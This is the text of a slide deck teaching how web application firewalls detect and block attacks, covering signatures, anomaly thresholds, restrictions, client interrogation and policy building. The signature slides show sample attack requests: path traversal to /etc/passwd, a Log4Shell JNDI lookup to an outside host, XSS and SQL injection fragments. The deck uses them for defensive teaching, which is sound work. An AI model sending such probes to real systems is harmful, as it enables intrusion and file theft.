More Related Content Similar to The WAF book (Web App Firewall ) (20) More from Lior Rotkovitch (14) The WAF book (Web App Firewall )3. 70295
©
About: Lior Rotkovitch
1. High Tech since 1994 : QA, IT, Pre- Sale security, consulting security
2. New Product Introduction (NPI), for F5 ASM WAF since 2006
3. F5 SIRT, Sr Security Engineer since 2016: PSIRT,CSIRT
4. Content Developer - Since 2000
5. Community project:
SIRT.club – promote defensive security.
gohitech – leveraging high tech culture.
▪ Email: lior.rotkovitch@gmail.com
▪ Twitter: @rotkovitch
▪ LinkedIn: Lior Rotkovitch
▪ Instagram: L.Rotkovitch
4. 70295
©
1) Target
2) Attack
3) Security
4) Policy
5) Incidents
6) Architecture
7) Operations
8) Security management
9) Assessment
10) SIRT
Comply:
Learning objective:
• Understand the ecosystem 1,2,3
• Applying security value – 4
• When under attack – 5
• Security design – 6
• WAF SW sustaining – 7
• Security Operations – 8
• Evaluating WAF – 9
• Who is doing what - 10
6. 70295
©
HTTP Response
HTTP Request
Web App Paradigm
THE
WEB
TCP/IP – Connection
Clients Web Application
Request
• Protocols
• Payload – Headers
• User input
Response
• Protocols
• Payload – Headers
• App output
8. 70295
©
DEV.SEC.OPS
NF
Web Application
Unknow User
Web Bot
Requests
Responses
ABSTRACTION LAYER/S
automated traffic
Application/s
Request
handler/s
AAA
Mobile app/ {API}
Database/s
DEV
Perimeter/Ingress
OPS
SIRT
Web Site
DEVOPS
App Mesh
Cloud private /public
Zone X
CI/CD
• Microservice
• Container
• Pods
Web App ecosystem - Modern
WAF NG
Mobile Users
Ads/ 3rd party services Partners
Valuable User
Valuable User
SIEM ≈
Analytics ∑
Internet
Edge
10. 70295
©
Micros services Data storage
login CP mgmt
ID
Browse
Web applications
Web
Server
App
Server
Database
Server
Classic
• Monolith
Cart
D B
Pay
Request/ Response
Manager
Zone 1 Zone 2
Classic Vs Modern
Modern
▪ Mesh app
▪ Microservices
Monomesh
o Classic / modern
3rd
13. 70295
©
HTTP Client Types
Device
OS
HTTP
Network
Tor
Devices:
• PC
• Laptop
• Tablet
• Mobile
• IoT
OS:
• Windows
• Linux
• MAC
• Android
• Containers
HTTP:
• Browser
• CLI tool
• Frameworks
• Scripting
• Mobile App
Networking – exit points
• ISP
• proxies
• VPN
• Tor
Networking media:
• Wire -> Router
• WiFi -> Router
• Mobile data
ISP
VPN
proxy
Clouds
WEB
14. 70295
©
Aggregated 21.21k 23.57 36.72k
172.29.46.46 2.75k 3.05 4.08k
192.168.1.14 2.26k 2.51 5.27k
192.168.190.191 2.25k 2.50 3.10k
10.10.1.200 2.23k 2.48 4.64k
10.0.0.138 2.01k 2.23 2.82k
0
20
40
60
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
IP1 IP2 IP3 IP4 IP5
0
500
1000
1500
2000
2500
3000
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
URL /
Expected Traffic Footprint
Top URL RPS Avr
/ 21.21k
/search.php 2.75k
/login.php 2.26k
/sell.php 2.25k
/user_login.php 2.23k
/forgot_pass 2.01k
Load % Numbers
CPU 70% 0/1/2
Memory 72% 80GB
Throughput 35% 11.7Mbps
RPS 25% 10k
GET / query.php HTTP/1.1
Connection: Keep-Alive
Host: sirt.club
User-Agent: browser (Java/1.8.0_221)
Status: Online Performance: Ideal
16. 70295
©
Attack status brief
Type:
• Random
• Targeted Random
• Targeted
Motivation
• Fame Fun and Profit
• Just because they can
• New WAR battlefield
Execution:
• Vulnerability hunting
• DDoS
• Brute force
• Malware
• BotNet
• Automation
• More…
CLIENTS
THE
WEB
19. 70295
©
HTTP
Application/s
Request
handler/s Database/s
Attack Surface
Attack surface examples:
1. Code – Function, library, URL, Parameter
2. Infrastructure – OS, servers, virtualization, keys,
3. System – hardware, network, devices
Vulnerability location
Attack Surface – the place where the
vulnerability exists. Also refer to the entry
point for the exploit or the meeting place
between the exploit and the vulnerability.
Web Application
20. 70295
©
HTTP
Request
handler/s Database/s
Attack Agent
Operate from:
• Clouds
• Mobiles
• PC/ tablet
• IoT
Request generator tool
Attack Agent – the software vehicle
that is used to sends the exploit to
the attack surface
Software Types:
• CLI
• Browser automation
• Client framework
Web Application
Application/s
21. 70295
©
HTTP
Request
handler/s Database/s
Exploit
Actual code that activate the vulnerability
Exploit – the code / pattern that
activate the vulnerability and allow
exploitation of the vulnerability.
Exploit types:
• POC exploit
• Exploitation exploit
• Weaponizing exploit – RCE
Web Application
Application/s
22. 70295
©
HTTP
Request
handler/s Database/s
Attack Vector
Attack technique and / or goal
Web Application
We use the same attack
elements for all the attacks. The
vector is the technique used to
achieve the goal
Goals:
• Deny service / impact performance – DoS
• Extract data from DB – SQLi
• Session stealing – XSS
• Account take over – brute force
Technique:
• DoS (floods, load)
• SQLi
• XSS
• Brute force
• Etc…
Application/s
23. 70295
©
Threat Landscape - Traditional
Users / HTTP clients
App SRV
Web SRV
Server/s
Database SRV
App owner
Web Exploits
Hacker playground
Web Application
▪ SQL injection
▪ Directory traversal
▪ Cross site attack
..;-()
..;-()
24. 70295
©
Threat Landscape - Modern
DEVOPS
partners
NF
Mobile Users
Ads/ 3rd party
services
Remote
employee
Web Bot
User
Requests
Responses
ABSTRACTION LAYER
Allowed
automated traffic
Application/s
Request
handler/s
Authorization
SIEM ≈
Analytics ∑
Mobile app/ API
Database/s
DEV
OPSSEC
INSIDER
HACKED
PURPOSE
BUILD BOTNET
Automation - battlefield
Cloud
${{:-}j
Internet
Cloud
26. 70295
©
Attack automation - Botnet – disturbed
Exploit
pool
Bot MASTER
Purpose build
Hacked
Infected
App A
App B
App C
App D
App A
App B
App C
App D
App D
App B
App C
App A
App D
App C
App B
App A
Site 3
Site 2
Site 1
©
27. 70295
©
AMO – Attack Modus Operandi
App A
▪ Firepower
▪ Scheduler
▪ Parsing results
ISP
VPN
Tor
proxy
• Impersonating
• Multi purpose
• Evasions
▪ Infected
▪ Hacked
▪ purpose build
▪ Geolocations
▪ Random
▪ Morphing
AV: CAV
▪ Botnet
▪ Hive net
▪ Swarm net
E
HTTP IP
28. 70295
©
• SQLi
• XSS
• LFI/ RFI
• RCE
• CSRF
Web Exploits
• BF
• CS
• PS
ATO
• Floods
• Loads
DDoS
BOT/S
BOTNET/S
Web Application
Attack Surface /s
Vulnerabilities
Exploit
Attack Agent
ATTACK AUTOMATION
AUTO
Summary
29. 70295
©
Attack Traffic Footprint
0
500
1000
1500
2000
2500
3000
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
URL /
Top URL RPS Avr
/ 21.21k
/search.php 2.75k
/login.php 2.26k
/sell.php 2.25k
/user_login.php 2.23k
/noneexisting 2.01k
Attack Elements
▪ Vulnerability
▪ Attack Surface
▪ Attack Agent
▪ Exploit
▪ Attack Vector
▪ Attack Automation
GET /search.php?q=../../../../../../etc/passwd HTTP/1.1
Host: sirt.club
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/95.0.4638.54
32. 70295
©
2. CONTROL PLAIN – SETTINGS
3. REPORTING - VISUALIZATION
DATA PLANE – ENGINES
1. DATA PLANE – ENGINES:
WEB APPLICATION
WEB CLIENTS
WAF SECURITY
ENGINEER
PARSER
ENGINE
TRAPS
ENGINE
ENFORCER
ENGINE
33. 70295
©
Request engines phases in WAF
Application Firewall Engines
Parser (entities) Value
Verb (Method) GET
Protocol HTTP 1.1
URL /index.php
User-Agent: Mozilla/5.00 (Nikto/2.1.6)
(Evasions:None) (Test:007240)
Source IP 192.168.1.1
Time 01:32:44
Detections: Signatures - User Agent
Python-urllib/2.6
Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240)
Mozilla/4.0 (Hydra)
Prevention action
Alarm
Block page
Reset conn
GET / HTTP/1.1
Host: sirt.club
User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240)
Parser
Traps Enforcer
Web Application
35. 70295
©
POST login.php HTTP/1.1
Host: www.sirt.club
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Accept-Language: en-US,en;q=0.9,he;q=0.8
Cookie: SESSION=2a59508d7509c6d2c21bbf5b
uname=meme&pass=god123
POST REQUEST
Post Data, Headers – Entities:
WEB CLIENTS
WEB APP
Entities
Host: sirt.club
Method: POST
HTTP version: 1.1
URL: login.php
Content-Length: 32
Content-Type application/x-www-form-urlencoded
Param 1 uname
Param 1 value meme
Param 2 pass
Param 2 value god123
POST Request Parsing
©
• HTTP headers
• Post data
https://sirt.club/login.php
36. 70295
©
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 13:53:00 GMT
Server: Apache X-Powered-By: PHP/7.4.26
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: Keep-Alive
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8326
Keep-Alive: timeout=5
Content-Type: text/html; charset=UTF-8
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible"
content="IE=Edge"/>
<meta charset="UTF-8" />
<title>SIRT Club: Security Incident Response Teams
Club</title>
<script type="text/javascript">
</script>
</head>
<body>
<div id="logo">
<p> Text </p>
</body>
</html>
Entities
Response
Status Code
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 13:53:00 GMT
Server: Apache X-Powered-By: PHP/7.4.26
Cache-Control: no-cache, must-revalidate, max-age=0
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8326
Response body
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<Body>
<p>SIRT protectors of the realm</p>
</Body>
</HTML>
HTTP Response Parser
WEB CLIENTS
WEB APP
RESPONSE
Payload
(headers)
Protocol
Server
output
©
37. 70295
©
TRAPS -> DETECTIONS:
Signatures - Pattern matching
Anomaly - Aggregation and thresholds
Client Interrogation - HTTP client inspection
Restrictions - Allow / Block lists
Protocol
Payload
User input
@
PARSER - ENTITY
©
39. 70295
©
Definition: Parten matching engine
Matching known words / key words on entities
• Pros
• Powerful pattern matching engine (IPS)
• Block know exploits
• Virtual patching & Leak prevention
• Security visibility – export detection
• Cons
• False positives
• Management time
• Consuming resources
Signatures Attacks: Web Exploit, Bot UA, SQLi, XSS,
LFI,RFI, Command Execution, Predictable
Resource etc
GET /search.php?q=EXPLOIT HTTP/1.1
Connection: keep-alive
Host: sirt.club
User-Agent: Mozilla/5.00
Signature example
▪ Informational signature – User agent, defaults, general words
▪ Generic exploits signature – common web exploits
▪ Specific exploit signature – CVE/ real known exploits
40. 70295
©
Parser (entities) Value
Verb (Method) GET
Protocol HTTP 1.1
URL /query.php
User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221)
Source IP 192.168.1.1
WAF User Agent signature
Python-urllib/2.6
Apache-HttpClient/4.5.7 (Java/1.8.0_221)
Mozilla/4.0 (Hydra)
Signature: Informational
GET / query.php HTTP/1.1
Connection: Keep-Alive
Host: sirt.club
User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221)
SIGNATURES
ENTITIES DETECTIONS
WEB APP
©
41. 70295
©
POST /submit.php HTTP/1.1
Host: sirt.club
Connection: keep-alive
User-Agent: Mozilla/5.0
Accept: text/html,application/,*/*;
Content-Length: 142
Cookie: SESSION=aafa5676ce60d1b33b58c0dd6de6fa87;
{“secret_book”: 6.9, “tlv_book”: [<scripts>alert('lala')<script>]}
Signature – POST Data
<scripts>alert('lala')<script>
<scripts>
alert('')
<script>
‘ or 1 =1
Parser (entities)
Host: sirt.club
Method: POST
HTTP version: 1.1
URL: submit.php
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html, image/webp, */*
POST Data
{“my_book”: 1.1, “tlv_book”:
[<scripts>alert('lala')<script>]}
SIGNATURES
Signature - Generic exploits
WEB APP
42. 70295
©
Signature – Specific Exploit
Application Firewall
Parser (entities) Value
Verb (Method) GET
Protocol HTTP 1.1
URL GUI.php${jndi:ldap://webappz.com}
User-Agent: Mozilla/5.00
Source IP 192.168.1.1
Time 01:32:44
CVE signatures
/............winntwin.ini
..../..../boot.ini
${jndi:ldap://webappz.com}
${jndi:
Prevention action
Alert
Block page
Reset conn
GET /GUI.php${jndi:ldap://webappz.com} HTTP/1.1
Host: sirt.club
User-Agent: Mozilla/5.00
Web App
Application
Server/s
Web
Server/s
Database
Server/s
43. 70295
©
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2024 13:53:00 GMT
Server: Apache X-Powered-By: PHP/7.4.26
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: Keep-Alive
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8326
Keep-Alive: timeout=5
Content-Type: text/html; charset=UTF-8
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
<meta charset="UTF-8" />
<title>SIRT Club: Security Incident Response Teams
Club</title>
<script type="text/javascript">
</script>
</head>
<body>
<div id="logo">
<p> Text </p>
</body>
</html>
Response
Status Code
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 13:53:00 GMT
Server: Apache X-Powered-By: PHP/7.4.26
Cache-Control: no-cache, must-revalidate, max-age=0
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8326
Response body
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<Body>
<p>Page Test </p>
</Body>
</HTML>
Signature - HTTP Response headers
WEB CLIENTS
RESPONSE
Headers
Response
body
Signature – Response Headers
Apache/2.1 (Unix) PHP/7.1.2
WEB APP
44. 70295
©
HTTP/1.1 200 OK
Date: Sun, 29 May 2022 13:13:13 GMT
Server: Apache/2.1 (Unix) PHP/7.1.2
Cache-Control: no-cache, must-revalidate, max-age=0
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html
<br>
<b>Warning</b>: Supplied argument is not a valid MySQL
result resource in <b> /var/htdocs/myapp/ </b> on line
<b>9</b><br>
<br>
<b>Warning</b>: Cannot add header information - headers
already sent by (output started at
/var/htdocs/myapp/login.php:9) in <b> /var/htdocs/myapp/
</b> on line <b>18</b><br>
Parser - Response
Response Status
Code
HTTP/1.1 200 OK
Date: Sun, 29 May 2022 13:13:13 GMT
Server: Apache/2.1 (Unix) PHP/7.1.2
Cache-Control: no-cache, must-revalidate, max-age=0
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Response body
<br>
<b>Warning</b>: Supplied argument is not a valid
MySQL result resource in <b> /var/htdocs/myapp/
</b> on line <b>9</b><br>
<br>
<b>Warning</b>: Cannot add header information -
headers already sent by (output started at
/var/htdocs/myapp/login.php:9) in <b>
/var/htdocs/myapp/ </b> on line <b>18</b><br>
RAW HTML Response
Signature – Response Body
“Supplied argument is not a valid MySQL result
resource in”
Signature - HTTP Response Body
FORM name="search" action="search.php" method="GET">
<INPUT type=HIDDEN name="">
<INPUT type="text" name="query" size=25 value="">
<INPUT TYPE=submit NAME="" VALUE=“Search">
</FORM></
46. 70295
©
Anomaly
• Pros:
• Easy to use
• Effective automation detection
• Very effective in noisy attacks
• Clear indication of automation
• Cons:
• Needs fine tune for each site
• Advance usage needs knowledge and
experience
Anomaly example
▪ Request per second (RPS)
▪ Failed log in (FLI)
▪ Session opening
▪ Other detections : signatures, metachars etc
Definition: Data aggregation engine
Measure exceeding defined threshold
Attacks: Brute force , credential stuffing
, application DDoS, floods etc
Above attack
Below ok
47. 70295
©
Internet
IP (Parser ) 5 min 20 min 1 hour AVG
10.0.0.138 50 60 180
192.168.1.1 180 0 0
172.29.44.6 400 350 3000
172.29.46.9 250 100 1000
10.1.1.1 1800 1200 800
192.168.24.24 0 100 150
Aggregated data – Policy limit per IP
Source IP: ANY @ 5 Min RPS limit
Min 220
Max 280
ANOMALY
Detection: Anomaly increase in RPS form IP’s
48. 70295
©
Anomaly – increase in RPS on URL’s
Application Firewall
Internet
URL RPS 5 min 20min 1 hour
AVG
Sell.php 500 600 1800
Help.php 120 100 100
Login.php 3000 6500 8000
Contact.us.php 1500 1000 800
1800 1800 1800
Promo.page.php 10 100 150
Aggregated data – Policy limit per IP
Source IP: ANY @ 5 Min RPS limit
Min 220
Max 280
sell.php
login.php
Contact.php
49. 70295
©
IP (Parser )
Sig count
5 min
Sig count
20min
Sig count
1H
10.0.0.138 500 600 1800
192.168.1.1 20 50 100
172.29.44.6 0 1 0
172.29.46.9 0 0 4
10.1.1.1 4 4 4
192.168.24.24 1 1 1
Aggregated data – Policy limit: Signatures per IP
Source IP: ANY @ 5 Min Max signature from IP / 5min
Min 20
Max 80
Post max 150 -> shun for 12 hours
ANOMALY
Internet
Detection: Anomaly increase Sig from IP
©
50. 70295
©
IP (Parser )
Current
FLI /5min
60min
FLI
10.0.0.138 60 180
192.168.1.1 0 0
172.29.44.6 35 40
172.29.46.9 100 1000
10.1.1.1 1800 3000
192.168.24.24 10 150
Aggregated data – Policy limit: FLI per IP
Source IP: ANY @ 5 Min FLI/IP over 5 min limit :
Min 300
Max 1000
Internet
Detection: Anomaly increase in FLI form IP’s
Fail Login
Try Again
ANOMALY
IP X
IP Y
IP Z
51. 70295
©
Anomaly – increase in FLI from Geo
Application Firewall
Internet
IP IP to GEO Current
RPS
10m RPS
10.0.0.138 Country U 60 180
192.168.1.1 Country X 0 0
172.29.44.6 Country Y 350 3000
172.29.46.9 Country W 100 1000
10.1.1.1 Country V 1800 1800
192.168.24.24 Country Z 100 150
Aggregated data – Policy limit per IP
Source IP: country @ 5 Min RPS limit
Min 300
Max 1000
IP’s
52. 70295
©
0
2
4
6
8
10
12
14
16
18
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
IP’s/URL’s
Anomaly - Fixed Vs Ratio
0
5
10
15
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
IP/URL
App 1
54. 70295
©
• Pros:
• A powerful and granular allow / deny
alerting and enforcement list
• Provides a schema for ETF
• Provide a schema for user input validation
• Holistic security
• Cons:
• Needs fine tune – false positive
• Needs management
• Block on first occurrence is limited
Hit count then block is the best
Restrictions
Matching Allow / Block lists Restriction examples:
▪ Characters sets
▪ RFC & evasion
▪ Flow
▪ Structure
Definition: structure restriction engine
Attacks: SQLi, XSS, directory traversal,
evasions etc
Structure Allow
Schema Block
Methods Allow
RFC Block
Encoding Block
Protocol WebSocket Allow
Protocol HTTP 1.0 Block
55. 70295
©
Restrictions – size
Size Min Chars Max chars
GET Param value Min 3 chars Max 130 chars
Parser
(entities)
Value Size - found
Verb (Method) GET
Protocol HTTP 1.1
Parameter name q
Parameter value longlonglonglonglonglonglonglonglonglonglong
longlonglonglonglonglonglonglonglonglonglong
longlonglonglx00nglonglonglonglonglonglonglo
nglong
136 chars
Source IP 192.168.1.1
Time 01:32:44
http://sirt.club/search.php?q=longlonglonglonglonglonglonglon
glonglonglonglonglonglonglonglonglonglonglonglonglonglonglon
glonglonglonglonglonglonglonglonglonglonglong
Host: sirt.club
User-Agent: Mozilla/5.0
Accept: text/html,application/,*/*;
Payload size policy
RESTRICTIONS
56. 70295
©
Restrictions – HTTP RFC
RFC @ any request Policy – allow/ Deny
Header with no value Block
Double host header Block
HTTP verbs: POST Get HEAD Block
Null in request Block
Parameter value with ' Block
Protocol versions 1.1 Allow
Protocol versions 1.0 Block
Parser (entities) Value
Verb (Method) Head
Protocol HTTP 1.0
Parameter name q
Parameter value mc’mer
Host header 172.29.46.23
SIRT.CLUB
Time 11:11:11
Header123 _____
Accept text/html,application/,*/* %00;
RESTRICTIONS
Options /search.php?q=mc’merHTTP/1.0
Host: SIRT.CLUB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114
Safari/237.36
Accept: text/html,application/,*/* %00;
Host: 172.29.44.44
Header123:
57. 70295
©
Restrictions – Meta characters
Parser (entities) Value
Verb (Method) GET
Protocol HTTP 1.1
Session D5!8ec55996a207ed
Parameter name q
Parameter value Mc’dogal
Source IP 1.1.1.1
Time 01:11:11
http://sirt.club/search.php?q=Mc’dogal
RESTRICTIONS
Metachar for
Any parameter
value
Encoding
ASCII
Policy – allow/
Deny
# %35 Allow
$ %36 Allow
% %37 Allow
& %38 Allow
' %39 Deny
/ %47 Deny
< %60 Deny
58. 70295
©
Search Engine name FQDN Count /1 day
Google .googlebot.com 150
Bing .msn.com 160
Ask .ask.com 10
GET /coffee HTTP/1.1
Host: sirt.club
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Connection: close
DNS Server
rDNS- is the IP in the result
match the IP arriving
Source IP – x.y.z.z
Source IP – Y.Y.Y.Y
1.
2.
3.
5.
4.
Restrictions – rDNS query
59. 70295
©
HTTP/1.1 200 OK
Date: Mon, 29 May 2023 10:10:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html
<br>
<p> /var/htdocs/myapp/ </p> <br>
Credit cards numbers:
<p> 001001001001 </p> <br>
<p> 001002001003 </p> <br>
<p> 001006001004 </p> <br>
<p> 001006001771 </p> <br>
HTTP Response sanitation
Preventing :
• Data leakage
• Credentials spilling
RESPONSE
<p> /var/htdocs/myapp/ </p> <br>
Credit cards numbers:
<p> user1@email1.com: 123456 </p> <br>
<p> user2@email1.com: qwerty </p> <br>
<p> goduser1@email1.com: LOL123 </p> <br>
<p> uadmin1@email1.com: password </p> <br>
REQUEST
Pattern Occurrences > 2
Pattern Occurrences > 3
N/A
61. 70295
©
Client Interrogation
Who is the client ?
1. Simple bot
2. Full browser bot
3. Full human bot
Definition: HTTP client inspection for
understating who is the HTTP client
• Pros
• Helping with identifying bots/ automation
• Examining Attack Agent
• Works beyond IP level
• Powerful with other detection
• Cons
• Add round trip, delay the load time
• Can be tricked
• No blocking
Types
I. CAPTHCA
II. Client capabilities L1-3
III. Source ID (SID)
Attacks: bot /botnets for any attacks.
Automated traffic Attack agents
62. 70295
©
User Browser
WAF - CI
App
First request GET /sell.php
GET /sell.php (not verified)
Client – interrogation
Return interrogation results
Forward request
HTTP Response (verified)
interrogation Tests:
• CLI ?
• Support JS?
• Support cookie ?
• Mouse movements ?
• Event sequence ?
• UA fit resolution ?
• Framework ?
GET /img.png (verified )
GET /img.png (verified)
HTTP Response (verified)
HTML rendering
interrogation results :
If failed – drop / block request
if pass – forward
Client interrogation – concept
63. 70295
©
Type the words :
SIRT#1
AUTO
Type the words :
SIRT#1
??!?!?!!
SIRT#1
©
Human
Not human
Client interrogation I : CAPTHCA
65. 70295
©
IP:Y
IP:X
IP:Z
Client interrogation III : SID
IP:X SID: 9883 10 RPS
IP:X SID: 1253 50 RPS
IP:Z SID: 4948 100 RPS
IP:Z SID:1151 20 RPS
IP:Z SID: 2222 12 RPS
IP:Y SID: 2873 0 RPS
SID: 9883
SID: 1253
SID: 2873
SID: 1151 SID: 4948
SID: 2222
Measuring IP/SID Binding
Client interrogation
Who are you ?
68. 70295
©
❑ SMS
❑ Messaging – slack
❑ Email
ALERT
To: WAF admin
❑ DASHBOARD – ALERT / CRITICAL
❑ GRAPHS – VISUAL
❑ STATISTICS – TABLES
❑ LOGS – REQUEST LOGS
Alert – the most basic but the most important. The money time
And security visibility feedback loop
Browse
r
User
IP
Attacker
©
WAF Reporting (GUI)
External alert utility
69. 70295
©
Your traffic is violating the site policy.
If this continues, please contact our support
111-111
Block ID: 10ABC
TCP FIN / RESET
Drop connection
Semi blocking:
Scrubbing / Stripping / Cloaking
Browse
r
BLOCK
This request has been blocked
To: End Users
©
Blocking page
70. 70295
©
• Limiting rate of RPS on specific IP
• Limiting RPS on site
• Limiting RPS on specific URL
• Limiting time
• Limiting access – 4 hours ban
LIMIT
IP
q
search.php
index.php
IP
• Rate limit on the client side
Advantages
▪ Slowdown / Delay attack
▪ Less aggressive then blocking
▪ Typically works on anomalies
• Rate limit on the server side
71. 70295
©
Send users to honeypot for inspections
Resent browser to main page
FOLLOW UP Advantages
▪ Delay attack
▪ Hides blocking actions
▪ Investigating activity
302: HOME
Fake app keep them busy
Redirect
Honeypot
72. 70295
©
Your traffic is violating the site policy.
If this continues, please contact our support
111-111
Block ID: 10ABC
Browser
This request has been blocked
Wrong username password,
please try again :
Login
Forgot password
Password
User:
Home | Buy| login| Help
Retaliation
Not available
Home | Buy| login| Help
Please try again later
Soft Block
Hard block
FOLLOW UP
73. 70295
©
PARSER ENGINE TRAPS ENGINE ENFORCER ENGINE
REQUEST ARRIVE
WAF DATA PLANE REQUEST/RESPONSE PROCESS
PARSER ENGINE
TRAPS ENGINE
ENFORCER ENGINE
RESPONSE
ARRIVE
SIGNATURES
RESTRICTIONS
ANOMALY
CLIENT
INTERROGATION
Protocol
Payload
User input
SIGNATURES
RESTRICTIONS
ANOMALY
CLIENT
INTERROGATION
Protocol
Payload
User input
ALERT
BLOCK
LIMIT
FOLLOW UP
ALERT
BLOCK
LIMIT
FOLLOW UP
75. 70295
©
WAF – inline traffic inspector
WEB APPLICATION
Application/s
Request
handler/s
Database/s
Expected Traffic Footprint
Attack Traffic Footprint
No Services
for you
WEB APP OWNER
✓ Allow valuable traffic
✓ Stop attack
Welcome P D E
©
77. 70295
©
Rules Concept
PROTOCOL
PAYLOAD – HEADERS
USER INPUT
SIGNATURES
ANOMALY
RESTRICTIONS
CLIENT INTERROGATION
ALERT
BLOCK
LIMIT
FOLLOW UP
• Detection
ENFORCER
TRAPS
PARSER
E D P
• Entity • PA
user input parameter value Signature SQLi select * from Blocking page
79. 70295
©
❑ Allow
❑ Monitor
❑ Block
Brute force Prevention Rules
E D P
E D P
E D P
E D P
P
ADDoS Prevention Rules
Vulnerability Hunting Prevention Rules
E D P
Bot/Botnet Prevention Rules
APP
©
E D P
E D P
E D P
E D P
E D
80. 70295
©
A. What you want
B. How do to it
E
D
P
?
?
?
• App Risk level
• Human labor
• WAF capabilities
WAF policy – building
82. 70295
©
Labor
How many people
• Knowledge
• Skill sets
• Experience
Working hours: 1 person per 20 base polices
Off hours: 1 person – monitoring / acting
• Web app type : traffic, users, criticality
• Polices number / apps (total)
• Policy complexity – number of PE’s (features)
• Coverage – follow the sun
*Estimations
85. 70295
©
How to build a policy
Create Rule
Verify Rule
Enforce Rule
A good rule:
▪ No false positive
▪ Blocking the defined criteria
E D P
C V E
Pass traffic:
• No hits – enforce
• Hits – keep in alert mode
• Define the entity/ies
• Configure the detections
• Apply prevention
action (beyond alert)
86. 70295
©
Ways to build polices
➢ Manual
➢ Heuristics
➢ Statistics
➢ Aggregations
Protocol
Payload
User input
SIGNATURES
RESTRICTIONS
ANOMALY
CLIENT
INTERROGATION
ALERT
BLOCK
LIMIT
FOLLOW UP
Define entity
Config detection
Apply prevention action
Traffic
Trusted traffic concept
No attack traffic.
If hit -> false positive
88. 70295
©
E D P
E D P
Valuable user – blocked on false positive rule
Real Attack
Valuable user
Why ?
False Positives – the enemy of security value
False positive – identifying good traffic as bad traffic
i.e. the rule get hit but it is not an attack
89. 70295
©
P
E D P APP
Create rule
Verify rule
Enforce
E D P
E D
Alarm – no Hit
Alarm - Hit
Blocking – Hit
Outcome:
a) Hits are false positives – Refine or keep in alert
b) Hits are attack – Blocked
c) Hits are FP and RA – Sperate the rules or add other migrations
d) No hits – Block when Timeline
e) Hits (Few) - keep in Alert (default)
Rules maturity / life cycle
Timeline
90. 70295
©
Entity
Bad parsing
Un supported protocol
Bad payload
Detections
Signatures – know word
Anomaly – wrong thresholds
Restrictions – legitimate mc
Client int – wrong ID
Prevention
Block – good users
Honey pot – wrong data
False positive examples
91. 70295
©
WAF Policy – Features
Brute force Rules
E D P
E D P
E D P
E D P
E D P
E D P
E D P
ADDoS Rules
Vulnerability Hunting Rules
E D P
E D P
E D P
Bot/Botnet Rules
APP
WAF
POLICY
❑ Signature
❑ User agent
❑ Headers
❑ User input
❑ Normalization engine
❑ Brute force protection
❑ Distrusted brute force
❑ Prevention
❑ Ban for X hours
❑ CAPTCHA
❑ Bot protection
❑ Web scraping protection
❑ Log all transaction
❑ Slow post detection
93. 70295
©
App health
Incidents
WAF Security level
Traffic
E:H D:S BLOCK
E:URL D:A ALARM
1IP 100 Req
Critical
E:IP D:R RATE LIMIT
Medium
High 1IP 10Req
10IP 1000Req
Brute force App DDoS Web Exploit
60% 70% 50%
56.00%
58.00%
60.00%
62.00%
64.00%
66.00%
68.00%
70.00%
72.00%
App 1 App2 App3 App4
SIRT WA-CAV
WAF Health
Load avr% Numbers
CPU 65% 16 core
Memory 55% 64GB
Throughput 35% 6.66G
RPS 25% 111,000
99 LIVE I’M OK
94. 70295
©
Aggregated 21.21k 23.57 36.72k
10.10.1.12 2.75k 3.05 4.08k
172.29.46.44 2.26k 2.51 5.27k
192.168.1.1 2.25k 2.50 3.10k
172.16.184.126 2.23k 2.48 4.64k
192.168.1.12 2.01k 2.23 2.82k
0
500
1000
1500
2000
2500
3000
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
RPS @ URL /
Top URL’s RPS
/ 21.21k
/search.php 2.75k
/login.php 2.26k
/sell.php 2.25k
/user_login.php 2.23k
/blog.php 2.01k
Statistics
0
1000
2000
3000
